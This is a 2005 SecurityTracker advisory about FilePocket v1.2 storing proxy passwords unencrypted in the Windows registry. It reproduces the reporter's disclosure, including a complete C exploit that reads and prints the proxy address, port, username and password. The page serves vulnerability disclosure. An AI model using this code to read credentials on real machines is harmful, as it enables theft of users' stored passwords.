SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   FilePocket Vendors:   ExoticSoft
FilePocket Discloses Proxy Passwords to Local Users
SecurityTracker Alert ID:  1013823
SecurityTracker URL:  http://securitytracker.com/id/1013823
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Apr 28 2005
Impact:   Disclosure of authentication information
Exploit Included:  Yes  
Version(s): 1.2
Description:   Kozan reported a vulnerability in FilePocket. A local user can view passwords.

The application stores proxy passwords in the Windows registry in plain text format. A local user can view the proxy passwords.

Impact:   A local user can view proxy passwords.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.exoticsoft.com/ (Links to External Site)
Cause:   Access control error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  FilePocket v1.2 discloses proxy passwords to local users.


---------------------
Application:
---------------------

FilePocket v1.2

---------------------
Introduction:
---------------------

Vendor: ExoticSoft - www.exoticsoft.com

Vendor Description: Do you need to publish files on the Internet but
are not sure how to do it? FilePocket will help you. You no longer
have to have your own Web site or ask someone to help distribute your
files. With FilePocket you can quickly choose necessary files and
publish them on the Internet. FilePocket looks very similar to Explorer,
so using it is made easy and familiar. Your files will be accessible to
your friends and colleagues on your personal Web page.

---------------------
Bug:
---------------------

FilePocket v1.2 stores proxy passwords in windows registry
in plain text format without crypting and can be viewed by a local user.

---------------------
Vendor Confirmed:
---------------------

No.

---------------------
Fix:
---------------------

There is no solution at the time of this entry.

---------------------
Exploit:
---------------------


/*****************************************************************

FilePocket v1.2 Local Proxy Password Disclosure Exploit by Kozan

Application: FilePocket 1.2 (probably prior versions)
Vendor: ExoticSoft - www.exoticsoft.com
Vulnerable Description: FilePocket v1.2 discloses proxy passwords
to local users.

Discovered & Coded by: Kozan
Credits to ATmaCA
Web : www.netmagister.com
Web2: www.spyinstructors.com
Mail: kozan@netmagister.com

*****************************************************************/

#include <stdio.h>
#include <windows.h>

#define BUFSIZE 100
HKEY hKey;
char proxyaddr[BUFSIZE],
        proxyport[BUFSIZE],
        proxyuser[BUFSIZE],
        proxypass[BUFSIZE];
DWORD dwBufLen=BUFSIZE;
LONG lRet;

int main(void)
{

       if(RegOpenKeyEx(HKEY_CURRENT_USER,"Software\\FilePocket\\Settings",
                                       0,
                                       KEY_QUERY_VALUE,
                                       &hKey) == ERROR_SUCCESS)
       {

			lRet = RegQueryValueEx( hKey, "ProxyAddress", NULL, NULL,(LPBYTE)
proxyaddr,&dwBufLen);
			if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyaddr,"Not
found!");

			lRet = RegQueryValueEx( hKey, "ProxyPassword", NULL, NULL,(LPBYTE) proxypass,
&dwBufLen);
			if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxypass,"Not
found!");

			lRet = RegQueryValueEx( hKey, "ProxyUsername", NULL, NULL,(LPBYTE) proxyuser,
&dwBufLen);
			if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyuser,"Not
found!");

			lRet = RegQueryValueEx( hKey, "ProxyPort", NULL, NULL,(LPBYTE) proxyport,
&dwBufLen);
			if( (lRet != ERROR_SUCCESS) || (dwBufLen > BUFSIZE) ) strcpy(proxyport,"Not
found!");

			RegCloseKey( hKey );

			printf("FilePocket v1.2 Local Proxy Password Disclosure Exploit by Kozan\n");
			printf("Credits to ATmaCA\n");
			printf("www.netmagister.com  -  www.spyinstructors.com\n");
			printf("kozan@netmagister.com\n\n");
			printf("Proxy Address   : %s\n",proxyaddr);
			printf("Proxy Port      : %s\n",proxyport);
			printf("Proxy Username  : %s\n",proxyuser);
			printf("Proxy Password  : %s\n",proxypass);

		}
		else printf("FilePocket is not installed on your system!\n");
		return 0;
}




Kozan...
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC